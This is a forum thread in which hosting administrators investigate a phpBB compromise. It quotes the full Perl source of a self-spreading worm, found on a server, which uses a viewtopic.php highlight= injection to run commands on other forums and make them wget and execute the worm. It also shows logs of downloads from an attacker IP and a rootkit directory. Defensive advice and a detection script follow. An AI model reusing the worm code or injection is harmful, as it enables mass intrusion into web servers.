Full Version: asw.txt ?
The Planet Forums > Control Panels > Plesk
sander815
I have a lot of these entries in error_log

CODE
--02:27:52--  http://chronologie4.com/phpBB2/asw.txt
          => `asw.txt.529'
Resolving chronologie4.com... done.
Connecting to chronologie4.com[65.77.211.120]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,341 [text/plain]

   0K ...                                                   100%   24.72 KB/s


What is this?

CODE
# asw:  anti santy worm

# this worm will try to fix any viewtopic.php on local box

# will use this box for 1 day to search other buggy phpBB forums, and end.



use strict;

use IO::Socket;

use IO::Handle;



sub fetch();

sub remote($);

sub http_query($);

sub encode($);



sub fetch(){

   my $rnd=(int(rand(9999)));

   my $n= 50;

   if ($rnd<5000) { $n<<=1;}

   my $s= (int(rand(10)) * $n);



   my @str=("%22Powered+by+phpBB%22+",

     "%22View+previous+topic+::+View+next+topic%22+",

     "%22post+new+topics+in+this+forum%22+",

     "%22reply+to+topics+in+this+forum%22+",

     "%22edit+your+posts+in+this+forum%22+",

     "%22delete+your+posts+in+this+forum%22+",

     "%22vote+in+polls+in+this+forum%22+",

     "%22Post+subject%22+phpBB+");



   my $query="www.google.com.ar/search?q=";

   $query.=$str[(rand(scalar(@str)))].$rnd;

   $query.="+-modules&num=$n&start=$s";



   my @lst=();

   my $page = http_query($query);

   while ($page =~  m/<a href="?http://([^>"]+)"?>/g){

    if ($1 !~ m/google|cache|translate/){

    push (@lst,$1);

    }

   }

   return (@lst);

}



sub http_query($){

   my ($url) = @_;

   my $host=$url;

   my $query=$url;

   my $page="";

   $host =~ s/href="?http:////;

   $host =~ s/([-a-zA-Z0-9.]+)/.*/$1/;

   $query =~s/$host//;

   if ($query eq "") {$query="/";};

   eval {

    local $SIG{ALRM} = sub { die "1";};

    alarm 10;

    my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;

    print $sock "GET $query HTTP/1.0nHost: $hostnAccept: */*nUser-Agent: Mozilla/4.0nn ";

    my @r = <$sock>;

    $page="@r";

    alarm 0;

    close($sock);

   };    

   return $page;



}



sub encode($) {

   my $s = shift;

   $s =~ s/(.)/"chr(".ord($1).")%252E"/seg;

   $s =~ s/%252E$//;

   return $s;

}





if (-e "log.txt") {exit;}

eval {fork and exit;};



$|++;

open LOG,">>log.txt";

autoflush LOG 1;

srand;

my $iam=$ARGV[0];

my $oneday=time+86400;

my $page="";

my @urls;

my $url;





## first fix viewtopic to aviod future attacks

my @in=`find / -name  "viewtopic.php" 2>/dev/null`;

foreach my $f (@in){

   chop $f;

   my $newvt="";

   if (open FIX,"<$f") {

    print LOG "nReading: $f ";

    while (<FIX>){

    $newvt.=$_;

    }

    close FIX;

    $newvt =~ s/urldecode//;

    if (open FIX,">$f"){

    print FIX $newvt;

    close FIX;

    print LOG " <--Fixed";

    }

   }

}

print LOG "n";





while(time<$oneday){

   @urls=fetch();

   foreach $url (@urls) {

    if ($url !~ /viewtopic.php/) {next;}

    $url =~ s/(.*/viewtopic.php?[t|p]=[0-9]+).*/$1/;

    print LOG "chk ".$url." ";

    my $cmd=encode("perl -e "print q(jSVowMsd)"");

    $url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";

    $page = http_query($url);

    if ( $page =~ /jSVowMsd/ ){

    $url =~ s/&highlight.*//;

    my $upload=$url;

    $upload =~ s/viewtopic.*//;

    print LOG ">bug viewtopic found ";

    $cmd="wget $iam/$0; perl $0 $upload;";    # set cmd

    $cmd=encode("$cmd");    # set cmd

    $url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";

    $page = http_query($url);

   

    $cmd="cd /tmp; wget $iam/$0; perl $0 $iam;";    # set cmd

    $cmd=encode("$cmd");    # set cmd

    $url =~ s/&highlight.*//;

    $url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";

    $page = http_query($url);

    print LOG ">donen";

    }

    else {

    print LOG ">viewtopic okn";

    }

   }

}

close LOG;
sander815
Files end up in /tmp: asw.txt till asw.txt.899

In /tmp there's also a log file:
CODE
chk forums.tolkienonline.com/viewtopic.php?t=56528 >viewtopic ok
chk www.lushforums.com/viewtopic.php?p=193141 >viewtopic ok
chk www.gamerpub.com/phpBB2/viewtopic.php?p=4504 >viewtopic ok
chk www.ueoclan.com/forums/viewtopic.php?p=25675 >viewtopic ok
chk forums.kingdomofloathing.com/viewtopic.php?t=11161 >viewtopic ok
chk www.xmfan.com/viewtopic.php?p=118348 >viewtopic ok
chk www.macnet2.com/phpBB2/viewtopic.php?p=1459 >viewtopic ok
chk www.autosupplyuk.com/forums/viewtopic.php?p=1459 >viewtopic ok
Squire
It's a rather nasty virus affecting some versions of PHPBB.

For more details: http://www.zone-h.org/en/news/read/id=4440
davily
Is there any threat to the rest of the server because of this, or only to the site running PHPBB?

I have them too and am currently tracking down which user it is
sander815
How can I stop it?
Mount /tmp with noexec?
Squire
Have your customers upgrade their PHPBB installation if they're running a version of PHPBB that is prior to 2.0.11. That version is supposedly safe from the exploit.

Or barring that, a fix for the viewtopic bug for this bulletin board software is located here.

Squire
davily
Thanks for the code update. I am in the middle of performing the necessary code change and also having them upgrade to 2.0.11, but I am rather concerned about the security of the box as a whole. Is there any risk in a malicious user doing more than corrupting the site that has phpbb? I also see the following in my http log

--08:12:22-- http://67.19.194.20/%7Estorm/system
=> `system'
Connecting to 67.19.194.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27,519 [text/plain]

0K .......... .......... ...... 100% 1.14 MB/s

08:12:22 (1.14 MB/s) - `system' saved [27519/27519]

sh: line 1: IRC: command not found
sh: line 1: IRC: command not found
sh: line 1: IRC: command not found
sh: line 1: IRC: command not found
sh: line 1: IRC: command not found

Is it related? And my tmp directory now has a '.tmp' within it. I have run rkhunter and it doesn't find any issues. Is it anything to worry about?

[root@ root]# cd /tmp/.tmp
[root@.tmp]# ls -l
total 580
-rwxrwxrwx 1 apache apache 18132 Nov 13 14:50 f3
-rwxrwxrwx 1 apache apache 19414 Nov 13 14:51 mremap2
-rwxrwxrwx 1 apache apache 14936 Nov 13 14:55 ptrace24
drwx------ 2 apache apache 4096 Jan 2 09:48 tmp
-rw------- 1 apache apache 51200 Dec 25 01:30 tmp.tgz
-rwxr-xr-x 1 apache apache 468689 Nov 13 14:56 w00t
[root@ .tmp]# cd tmp
[root@ tmp]# ls -l
total 52
-rwxrwxrwx 1 apache apache 43932 Dec 22 04:29 bash
-rw------- 1 apache apache 992 Dec 22 04:30 bash.conf
-rw------- 1 apache apache 6 Dec 26 21:46 pid.bash
sander815
Try chmodding these:

chmod 750 /usr/bin/rcp
chmod 750 /usr/bin/wget
chmod 750 /usr/bin/lynx
chmod 750 /usr/bin/links
chmod 750 /usr/bin/scp

so they are unable to run wget to get the files.
davily
Another weird item: when I do an ls -al on /tmp I get this output

[root@ tmp]# ls -al |more
total 31164
drwxrwxrwt 8 root root 102400 Jan 2 17:37 .
drwx------ 4 apache apache 4096 Jan 1 21:49 .
drwxr-xr-x 20 root root 4096 Jan 2 16:37 ..

The second "." doesn't look right. Can someone explain how it is showing the two?

Thanks
covici
Hi. What is rkhunter -- some kind of rootkit finder and where can I get it?

Thanks.
davily
QUOTE
Originally posted by covici
Hi.  What is rkhunter -- some kind of rootkit finder and where can I get it?

Thanks.


rootkit.nl

Also, to update on the additional directory owned by apache:

To cd into it you run the following command

#cd ".     "

(dot with 5 spaces in quotes.)

I stopped replying in this thread and opened one in security. You should go there to get the rest of your questions answered.

Hope that helps

Regards
Paul_Watson
A directory was created using spaces most likely. Try: cd '.[space]' or cd '.[space][space]' and similar. Also try doing an 'ls -alF' which will append a trailing / after the directory name and will indicate how many spaces.

QUOTE (davily)
another weird item.....when I do a ls -al on /tmp I get this output

[root@ tmp]# ls -al |more
total 31164
drwxrwxrwt    8 root     root       102400 Jan  2 17:37 .
drwx------    4 apache   apache       4096 Jan  1 21:49 .
drwxr-xr-x   20 root     root         4096 Jan  2 16:37 ..

The second "." doesn't look right. Can someone explain how it is showing the two?

Thanks
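Two checks an admin in this situation would want, written here as an added example and not code posted in the thread: a scan of web-server access-log lines for the `viewtopic.php?...&highlight=%2527%252E` request signature that the asw.txt source above builds, and a listing of directories whose names contain whitespace, which is how the ".     " directory davily found hides in plain `ls` output. The log lines are constructed sample data, not from the thread.

```shell
#!/bin/sh
# Constructed sample access-log lines (documentation-range IPs). Lines 2 and 4
# carry the double-encoded highlight= injection the worm source above sends.
SAMPLE_LOG='203.0.113.5 - - [02/Jan/2005:08:12:20 +0000] "GET /phpBB2/viewtopic.php?t=56528 HTTP/1.0" 200 4311
203.0.113.5 - - [02/Jan/2005:08:12:22 +0000] "GET /phpBB2/viewtopic.php?t=56528&highlight=%2527%252Esystem(chr(112)%252Echr(101))%252E%2527 HTTP/1.0" 200 4311
198.51.100.9 - - [02/Jan/2005:08:13:01 +0000] "GET /phpBB2/index.php HTTP/1.1" 200 1200
198.51.100.9 - - [02/Jan/2005:08:13:05 +0000] "GET /forums/viewtopic.php?p=4504&highlight=%2527%252Esystem(chr(119)%252Echr(103))%252E%2527 HTTP/1.0" 200 3000'

# Signature: viewtopic.php with a highlight= value starting %2527%252E
# (a double-encoded quote followed by a double-encoded dot).
SANTY_PATTERN='viewtopic\.php?.*highlight=%2527%252E'

# Number of log lines matching the signature; argument is the log text.
santy_hits() {
  printf '%s\n' "$1" | grep -c "$SANTY_PATTERN"
}

# Distinct client IPs (first field of the combined log format) that sent
# a matching request, one per line, sorted.
santy_sources() {
  printf '%s\n' "$1" | grep "$SANTY_PATTERN" | awk '{print $1}' | sort -u
}

# Directories directly under the given path whose names contain a space,
# e.g. the ".     " directory from the thread; ls -alF also exposes these.
odd_dirs() {
  find "$1" -mindepth 1 -maxdepth 1 -type d -name '* *' | sort
}

# Stand-alone run: report on the sample log and on /tmp.
if [ "${1:-}" = "--run" ]; then
  echo "Santy-style requests in sample log: $(santy_hits "$SAMPLE_LOG")"
  echo "Sources:"; santy_sources "$SAMPLE_LOG"
  echo "Directories in /tmp with whitespace in their names:"; odd_dirs /tmp
fi
```

Run against a real server with `santy_hits "$(cat /var/log/httpd/access_log)"`; a hit that returned 200 is a request the patched viewtopic.php would still log, so it marks a probe, not necessarily a compromise.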